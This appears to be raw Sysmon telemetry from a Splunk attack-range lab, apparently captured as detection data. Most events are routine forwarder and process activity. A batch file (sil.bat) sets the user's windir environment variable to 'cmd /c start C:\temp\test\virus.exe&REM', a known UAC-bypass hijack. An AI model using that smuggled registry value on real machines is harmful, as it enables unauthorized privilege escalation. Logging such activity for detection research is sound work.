07:57:08.322{466BC892-F5D4-60EB-737D-00000000CF01}7616C:\Program Files\Notepad++\notepad++.exe8.11Notepad++ : a free (GPL) source code editorNotepad++Don HO don.h@free.frnotepad++.exe"C:\Program Files\Notepad++\notepad++.exe" 
"C:\Temp\test\sil.bat"C:\Windows\system32\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=3433991765511375D3EC11B4FE290298,SHA256=B30DDA913768A864106485E51682E90286D320023221F5676A42CC9B914A11F8,IMPHASH=B65402F137E08F6E43CEEF2CF25E0CC2{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x80000000000000001050875Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:08.341{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94AFECF8D4C6C020F7B5FEF62236F3EF,SHA256=C39A9C7BCD72144160E9A1CAB328ED537F23F86487B050B8EF5965BB7C8563F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808432Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:09.840{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6D536F246EBA3293D46BCD74A1210CC,SHA256=E73234A98E7B12A5374C0E2EBF3AC2564434E2BBE9C60257622F4F8E1182AFB5,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001050888Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:09.723{466BC892-3152-60E8-240B-00000000CF01}3328C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\axpgvkas.default-release\AlternateServices.txt2021-07-09 11:26:57.697 23542300x80000000000000001050887Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:09.723{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\axpgvkas.default-release\AlternateServices.txtMD5=CD89B5DA97B6A86A69236FC9D0852E18,SHA256=BDBA6009B73873EC2E4FCE5D54A0C2BA57FE945AC3DF50684B52FE584BEE82E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050886Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:09.360{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB105E9A3C121ACEF828696CCE8D0DDD,SHA256=A6050E8DF9C408A693F2E1FABD129A42F15B26C85629C78845C972F97684F943,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050885Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:09.344{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55C15B626C6003D1E37E4A208E66C500,SHA256=21D151C2E0B9AA6C44B878C4B73D73838B481E48EC1A4BA19BDB560A6A0F630C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808431Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:08.207{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57328-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808433Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:10.871{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=480AC5E6D1E75451C3E90BF3465FEBFF,SHA256=2D962F36DEDC849445E520125758D06571647F427DE40D5E2534D7D955311708,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050889Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:10.359{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88B54345F2B71F10D44CC4479E19F9F4,SHA256=260F46A93C2BF571A5A820C73A9727264AAF567BFE9BA64250AAF7B0BFC0E97F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808434Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:11.871{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B30AFFCB2F41BCF188F7091356DE416,SHA256=5896DCF73C41AAF2ABBC68ACD3AD482E7C9F2563535BF73B82C46DED27457596,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050891Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.713{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51095-false10.0.1.12-8000- 23542300x80000000000000001050890Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:11.363{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0631F57859867587E53A6C76FFB35A10,SHA256=282EC749E3E0F9665B2FF07F7F5BBF93881DE4240FC6543A0EFE264FD01DBCE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808435Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:12.887{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6727E14F803C37D111265F34121BCDC,SHA256=46033431E426C62E4F2C6A2C799597F1C809F94FC4D41DA50F38270E2CE8A822,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050892Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:12.388{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3574862F9B25CB39D3610EA77DE5AE56,SHA256=2B96075C71A65F2BF523902E218F1951D3B75B93BC953B3B3C8EFD8D567BA163,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808436Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:13.918{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22FB257A1442C4A6CA6F32CD12E3F483,SHA256=91A66DF861BED58A3A06C731C5CA1A27E1D4521014DF7BCB05DDA8E5699CDF34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050893Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:13.388{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=603F576DC476FDEE0FADC6388A5ABCB6,SHA256=1FE69FA245DC4530D27E2D0351E5AF12F1C1DDC3C6043B5DA013B9E03F7F53B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808438Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:14.962{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F65FAF129A4A336CFC0509C475E8B5E,SHA256=27893C08855CF23383A94DADA1C73D74913F6357982869B0B3C36BDA3DC1CBED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050894Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:14.405{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FDCB95169C60C66F2CDEC493C172DEF,SHA256=45D7D042A19F4792A5DDCE303E1163867146EE4CBFC5FA47E65F378B2886704C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808437Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:13.394{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57329-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001050901Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:07.980{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT 
AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51096-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001050900Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:07.980{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51096-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001050899Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:15.445{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=84B18A97F384235E1450CEEBC885957E,SHA256=D6DC5B17FF0E5F0B5FFC8088580BA4B469906438CE7A49F1C4B23FCF4DEF2A6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050898Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:15.445{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EB1E122BE79E3094640C7ED977F77184,SHA256=D6161615B8D945E8CBB5A5A55A98C46047F566DC1AB9CDB911A4A8DAE225C2E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050897Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:15.430{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78FF1CBB3174915EF0319E188ED44AD8,SHA256=7AFC20BA162BF3230AF3796D89598B8ED32AB8D190BBBF779452F4229B27B16C,IMPHASH=00000000000000000000000000000000falsetrue 
11241100x80000000000000001050896Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:15.191{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exeC:\Temp\test\sil.bat2021-07-12 07:44:38.363 23542300x80000000000000001050895Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:15.191{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Temp\test\sil.batMD5=F37A2EB46591A451D21627197B116801,SHA256=D6587494387D482BC0F9E9B633306F4622B98F0320497C053E6870CEC8047190,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050902Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:16.449{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A6A9800215283FF868E18BEA5861E18,SHA256=15C2A7B8E0B49151C35EDD9A0CDDCCDA9F8D8055B16D80B1BD76203E7EBCAF7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808439Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:16.009{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED194E7DC7544B5FDABB8EF47F864B2C,SHA256=638C19B83AD226C8BE9BAC6E702F07E788372E8C3D62967FF20BF15EFCDB1481,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050957Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.964{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=84B18A97F384235E1450CEEBC885957E,SHA256=D6DC5B17FF0E5F0B5FFC8088580BA4B469906438CE7A49F1C4B23FCF4DEF2A6D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050956Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:09.702{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51097-false10.0.1.12-8000- 23542300x80000000000000001050955Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.449{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9436C8F53A110319E0098ABB29BE8FC,SHA256=000E3C224671EFDC64D3011137606F8D52CF8E9E4BB9E854A8E9EE92DFD2DF47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808440Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:17.041{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B87D60A40CEF5E1793724D16AD77C08,SHA256=76A4F966C7CEFA695B3EF962F8BD6353207DAFD471312812A83B2DDD38C58EC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050954Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.265{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18AA8BAA394FEE0AE0E0E908F3798DDC,SHA256=C191CF2C641709EF8C6ABD5752956472F4DC8641F683FBC8CC77CE4D2B79C17F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050953Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.196{466BC892-F5DD-60EB-757D-00000000CF01}969210124C:\Windows\system32\conhost.exe{466BC892-F5DD-60EB-787D-00000000CF01}9404C:\Windows\system32\timeout.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050952Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.196{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050951Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:17.196{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050950Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.196{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050949Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:17.196{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050948Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.196{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5DD-60EB-787D-00000000CF01}9404C:\Windows\system32\timeout.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050947Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:17.196{466BC892-F5DC-60EB-747D-00000000CF01}43042332C:\Windows\system32\cmd.exe{466BC892-F5DD-60EB-787D-00000000CF01}9404C:\Windows\system32\timeout.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050946Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.205{466BC892-F5DD-60EB-787D-00000000CF01}9404C:\Windows\System32\timeout.exe10.0.14393.0 (rs1_release.160715-1616)timeout - pauses command processingMicrosoft® Windows® Operating SystemMicrosoft Corporationtimeout.exetimeout /t 2 C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=FF04FB5121867334F841D5EFD133633B,SHA256=F9B3348029B76BBB658A097BF361EA72CEFA0D15CE444E9E8A689B35B67A78E7,IMPHASH=709A3AA304E78434B9FA3FE865133AD0{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\test\sil.bat" " 13241300x80000000000000001050945Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:57:17.196{466BC892-F5DD-60EB-777D-00000000CF01}8868C:\Windows\system32\reg.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112\Environment\windircmd /c start C:\temp\test\virus.exe&REM 10341000x80000000000000001050944Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:17.196{466BC892-F5DD-60EB-757D-00000000CF01}969210124C:\Windows\system32\conhost.exe{466BC892-F5DD-60EB-777D-00000000CF01}8868C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050943Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.181{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050942Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:17.181{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 